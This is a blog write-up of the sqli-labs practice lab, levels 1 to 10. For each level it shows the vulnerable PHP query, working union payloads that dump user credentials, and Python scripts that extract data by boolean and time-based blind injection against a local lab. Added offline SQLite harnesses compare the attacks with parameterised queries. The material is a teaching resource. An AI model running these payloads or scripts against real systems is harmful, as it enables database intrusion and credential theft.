
    sql-lab

    Bored in the middle of the night, so I played around with sql-lab for a while to pass the time~


    less-1

    • Injection type: string

    Triggering code segment


    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    

    List all databases

    • group_concat() merges multiple result rows into a single row, so the whole list comes back in one displayed column.
    id=100' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
    

    Current database

    • Use the database() function.
    id=100' union select 1,database(),3%23
    


    List the tables of the current database

    id=100' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
    

    List the column names of the users table

    id=100' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'%23
    

    Dump the user records (0x207e2a7e20 is the hex encoding of the separator " ~*~ ", which avoids extra quotes in the payload)

    id=100' union select 1,group_concat('<br/>',id,0x207e2a7e20,username,0x207e2a7e20,password),3 from `users`%23
    


    less-2

    Integer injection (no quotes to close)

    Triggering code

    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    

    Dump the user records

    id=888 union select 1,group_concat('<br/>',id,0x207e2a7e20,username,0x207e2a7e20,password),3 from users
    

    less-3

    String type with an extra pair of parentheses around the quoted id

    Triggering code

    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    


    payload

    id=999')union select 1,group_concat('<br/>',id,0x207e2a7e20,username,0x207e2a7e20,password),3 from users%23
    

    less-4

    String type, double-quoted and wrapped in parentheses

    Triggering code

    $id = '"' . $id . '"';
    $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
    

    Because the id is wrapped in double quotes (inside parentheses), the payload has to close both before the UNION.

    payload

    id=888")union select 1,group_concat('<br/>',id,0x7e,username,0x7e,password),3 from users%23
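The four levels above differ only in what has to be closed before the injected UNION. The following is an added example, not code from the original post: it rebuilds each level's query string from the PHP shown above, runs the union payload against an in-memory SQLite table holding constructed rows (only the column names id/username/password match sqli-labs), and compares the vulnerable string-building path with a parameterised query. SQLite has no "#" comment and its group_concat() only takes (expr, separator), so the local harness uses "-- " and "||"; on MySQL keep the page's %23 and group_concat(id,0x7e,...). The less-4 payload is built but not executed, because whether SQLite accepts a double-quoted string literal depends on its DQS build setting. All function and variable names are my own.

```python
import sqlite3

# Constructed sample rows: column names follow the page, the values are made up.
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# How less-1 .. less-4 embed the untrusted id, taken from the PHP on the page.
TEMPLATES = {
    "less-1": "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    "less-2": "SELECT * FROM users WHERE id={id} LIMIT 0,1",
    "less-3": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
    "less-4": 'SELECT * FROM users WHERE id=("{id}") LIMIT 0,1',
}

# What the payload must emit to get out of the expression around $id before 'union'.
CLOSERS = {"less-1": "'", "less-2": "", "less-3": "')", "less-4": '")'}

# SQLite substitute for the page's group_concat(id,0x7e,username,0x7e,password):
# '||' is string concatenation here (on MySQL it is OR unless PIPES_AS_CONCAT is set).
DUMP = "group_concat(id || '~' || username || '~' || password, ',')"


def build_payload(level):
    """Union payload for one level: an id that does not exist so the UNION row comes first,
    the right closer, three columns to match users(id, username, password), and a trailing
    comment that swallows the leftover quote/parenthesis and the LIMIT 0,1."""
    return f"100{CLOSERS[level]} union select 1, {DUMP}, 3 from users -- "


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_query(conn, level, user_input):
    """The page's pattern: $id interpolated straight into the SQL text."""
    sql = TEMPLATES[level].format(id=user_input)
    return conn.execute(sql).fetchone()


def safe_query(conn, user_input):
    """Same lookup with a bound parameter: the input is data and is never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_input,)).fetchone()


def dump_via_union(level):
    """Returns the 'id~username~password' strings the UNION payload leaks for that level."""
    row = vulnerable_query(open_db(), level, build_payload(level))
    return row[1].split(",") if row else []


if __name__ == "__main__":
    for level in ("less-1", "less-2", "less-3"):
        print(level, "payload:", build_payload(level))
        print("        leaked:", dump_via_union(level))
    print("less-4 payload (not executed here):", build_payload("less-4"))
    print("parameterised lookup with the same input:", safe_query(open_db(), build_payload("less-1")))
```

The point the harness makes explicit: the comment at the end of the payload is what makes the trailing `' LIMIT 0,1` (or `') LIMIT 0,1`) harmless, and a bound parameter turns the entire payload into a string that simply matches no row.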
    

    less-5

    Boolean-based blind injection

    Triggering code segment

    if($row)
    {
        echo 'You are in...........';
    }
    else
    {
        print_r(mysql_error());
    }
    

    exp

    #less-5 boolean-based blind injection
    import requests

    url = "http://127.0.0.1/sqli-labs/less-5/?id=1' and "
    result = ""
    i = 0
    while True:
        head = 32
        tail = 127
        i += 1
        while head < tail:
            mid = (head + tail) >> 1   # midpoint of the remaining ASCII range
            # To read the current database name first, use this expression instead:
            # payload = " ord(substr( (select database()) ,%d,1))>%d %%23" % (i, mid)
            payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i, mid)

            r = requests.get(url + payload)
            if "You are in" in r.text:   # true branch rendered: the character is greater than mid
                head = mid + 1
            else:
                tail = mid
        # Past the end of the string substr() returns '' and ord('') is 0, so the search settles
        # at 32 and the loop stops; a real space (ord 32) in the data would also stop it early.
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
    print(result)
    

    less-6

    String type, boolean-based blind

    PHP wraps the id in double quotes, so this is a double-quoted string injection

    $id = '"'.$id.'"';
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    

    exp

    #less-6 boolean-based blind injection
    import requests

    url = "http://127.0.0.1/sqli-labs/less-6/?id=1\" and "   # the id is double-quoted in PHP
    result = ""
    i = 0
    while True:
        head = 32
        tail = 127
        i += 1
        while head < tail:
            mid = (head + tail) >> 1   # midpoint of the remaining ASCII range
            # To read the current database name first, use this expression instead:
            # payload = " ord(substr( (select database()) ,%d,1))>%d %%23" % (i, mid)
            payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i, mid)

            r = requests.get(url + payload)
            if "You are in" in r.text:   # true branch rendered: the character is greater than mid
                head = mid + 1
            else:
                tail = mid
        # Past the end of the string ord('') is 0, so the search settles at 32 and the loop stops
        # (a real space in the data would also stop it early).
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
    print(result)
    

    less-7

    String type (quoted id inside two pairs of parentheses), boolean-based blind

    $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
    

    exp

    #less-7 boolean-based blind injection
    import requests

    url = "http://127.0.0.1/sqli-labs/less-7/?id=1')) and "   # close the quote and both parentheses
    result = ""
    i = 0
    while True:
        head = 32
        tail = 127
        i += 1
        while head < tail:
            mid = (head + tail) >> 1   # midpoint of the remaining ASCII range
            # To read the current database name first, use this expression instead:
            # payload = " ord(substr( (select database()) ,%d,1))>%d %%23" % (i, mid)
            payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i, mid)

            r = requests.get(url + payload)
            if "You are in" in r.text:   # true branch rendered: the character is greater than mid
                head = mid + 1
            else:
                tail = mid
        # Past the end of the string ord('') is 0, so the search settles at 32 and the loop stops
        # (a real space in the data would also stop it early).
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
    print(result)
    

    less-8

    String type, boolean-based blind

    Code

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    

    exp

    #less-8 boolean-based blind injection
    import requests

    url = "http://127.0.0.1/sqli-labs/less-8/?id=1' and "
    result = ""
    i = 0
    while True:
        head = 32
        tail = 127
        i += 1
        while head < tail:
            mid = (head + tail) >> 1   # midpoint of the remaining ASCII range
            # To read the current database name first, use this expression instead:
            # payload = " ord(substr( (select database()) ,%d,1))>%d %%23" % (i, mid)
            payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i, mid)

            r = requests.get(url + payload)
            if "You are in" in r.text:   # true branch rendered: the character is greater than mid
                head = mid + 1
            else:
                tail = mid
        # Past the end of the string ord('') is 0, so the search settles at 32 and the loop stops
        # (a real space in the data would also stop it early).
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
    print(result)
    

    less-9

    Time-based blind injection

    Triggering code segment

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    

    Whether or not the query finds a row, the page prints "You are in", so there is nothing in the response body to compare.

    Constructing the payload

    The sleep() function is called inside the injected condition so that the response delay becomes the oracle.

    exp

    #less-9 time-based blind injection
    import requests
    import time

    url = "http://127.0.0.1/sqli-labs/less-9/?id=1' and "
    result = ""
    i = 0
    while True:
        head = 32
        tail = 127
        i += 1
        while head < tail:
            mid = (head + tail) >> 1   # midpoint of the remaining ASCII range
            # To read the current database name first, use this expression instead:
            # payload = " if(ord(substr( (select database()) ,%d,1))>%d,sleep(0.6),2) %%23" % (i, mid)
            payload = " if(ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d,sleep(0.6),2) %%23" % (i, mid)
            start_time = time.time()
            requests.get(url + payload)
            end_time = time.time()
            if end_time - start_time > 0.6:   # sleep(0.6) fired: the character is greater than mid
                head = mid + 1
            else:
                tail = mid
        # Past the end of the string ord('') is 0, the condition never holds, no delay occurs and
        # the search settles at 32, which ends the loop (as would a real space in the data).
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
    print(result)
    

    less-10

    Time-based injection

    Triggering section

    Same as less-9, except the id is wrapped in double quotes, so the payload closes a double quote instead.

    $id = '"'.$id.'"';
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    

    exp

    #less-10 time-based blind injection
    import requests
    import time

    url = "http://127.0.0.1/sqli-labs/less-10/?id=1\" and "   # the id is double-quoted in PHP
    result = ""
    i = 0
    while True:
        head = 32
        tail = 127
        i += 1
        while head < tail:
            mid = (head + tail) >> 1   # midpoint of the remaining ASCII range
            # To read the current database name first, use this expression instead:
            # payload = " if(ord(substr( (select database()) ,%d,1))>%d,sleep(0.6),2) %%23" % (i, mid)
            payload = " if(ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d,sleep(0.6),2) %%23" % (i, mid)
            start_time = time.time()
            requests.get(url + payload)
            end_time = time.time()
            if end_time - start_time > 0.6:   # sleep(0.6) fired: the character is greater than mid
                head = mid + 1
            else:
                tail = mid
        # Past the end of the string ord('') is 0, the condition never holds, no delay occurs and
        # the search settles at 32, which ends the loop (as would a real space in the data).
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
    print(result)
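The four boolean scripts (less-5 to less-8) and the two timing scripts (less-9, less-10) all run the same binary search, and all of them stop when a character comes back as 32, which silently truncates any value that contains a space. The following added example (not from the original post) factors the search out behind an oracle interface, extracts the length first so the loop ends at a known position instead of guessing from ord 32, and gives the timing oracle the margin and re-query logic that network jitter demands. It runs offline against an in-memory SQLite table with constructed rows standing in for sqli-labs' users table: SQLite's unicode() plays the role of MySQL's ord(), "-- " replaces "#", "||" replaces the multi-argument group_concat, and the fake server sleeps where MySQL's sleep(0.6) would. The class names, the 0.05 s delay and the 0.8/0.2 thresholds are my choices.

```python
import sqlite3
import statistics
import time

# Constructed sample data; the last password contains a space on purpose.
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"),
         (3, "Dummy", "p@ssword"), (4, "admin", "pass word")]
# SQLite version of the page's group_concat(id,0x7e,username,0x7e,password);
# '||' is concatenation here but OR on MySQL unless PIPES_AS_CONCAT is set.
SUBQUERY = "(select group_concat(id || '~' || username || '~' || password, ',') from users)"
CHAR_FN = "unicode"     # MySQL: ord(); both give the code point of the first character
SLEEP_SECONDS = 0.05    # stands in for sleep(0.6); small so the local demo finishes quickly

_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
_conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)


def _server(condition):
    """Stand-in for the PHP on the page: ...WHERE id='1' and <condition> -- ' LIMIT 0,1."""
    sql = f"SELECT * FROM users WHERE id='1' and {condition} -- ' LIMIT 0,1"
    return _conn.execute(sql).fetchone() is not None


class BooleanOracle:
    """less-5..8 style: the page either shows 'You are in' or it does not."""
    def __init__(self):
        self.requests = 0

    def __call__(self, condition):
        self.requests += 1
        return _server(condition)


class TimingOracle:
    """less-9/10 style: the body is identical either way; only the delay carries the answer.
    Mirrors if(<condition>, sleep(N), 2): the fake server sleeps when the condition holds."""
    def __init__(self, delay=SLEEP_SECONDS):
        self.delay = delay
        self.requests = 0

    def _measure(self, condition):
        self.requests += 1
        start = time.perf_counter()
        if _server(condition):
            time.sleep(self.delay)
        return time.perf_counter() - start

    def __call__(self, condition):
        elapsed = self._measure(condition)
        if elapsed >= 0.8 * self.delay:     # clearly delayed
            return True
        if elapsed <= 0.2 * self.delay:     # clearly immediate
            return False
        # Ambiguous band (what jitter produces in the real thing): re-query and take the median.
        samples = [self._measure(condition) for _ in range(3)]
        return statistics.median(samples) >= self.delay / 2


def find_int(oracle, expr, lo=0, hi=256):
    """Binary search the integer value of a SQL expression using only '<expr> > <mid>' questions.
    Returns lo when the expression is NULL or below lo, and hi when it is >= hi."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle, subquery, max_len=4096):
    """Length first, then one character per position, so a space (32) in the data is read
    like any other byte instead of ending the extraction."""
    length = find_int(oracle, f"length({subquery})", 0, max_len)
    return "".join(chr(find_int(oracle, f"{CHAR_FN}(substr({subquery}, {i}, 1))", 0, 128))
                   for i in range(1, length + 1))


if __name__ == "__main__":
    b = BooleanOracle()
    print(extract(b, SUBQUERY), "in", b.requests, "boolean requests")
    t = TimingOracle()
    print(extract(t, "(select password from users where id=4)"), "in", t.requests, "timed requests")
```

Two things worth carrying back to the real scripts: the request count printed by the boolean run is roughly 7 per character plus a dozen for the length, which is the budget a time-based version multiplies by the sleep; and on a real link the page's "> 0.6 with sleep(0.6)" threshold leaves no margin at all, so measure the baseline round trip first and keep the sleep well above it.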
    
    Original URL: https://www.cnblogs.com/h3zh1/p/13503255.html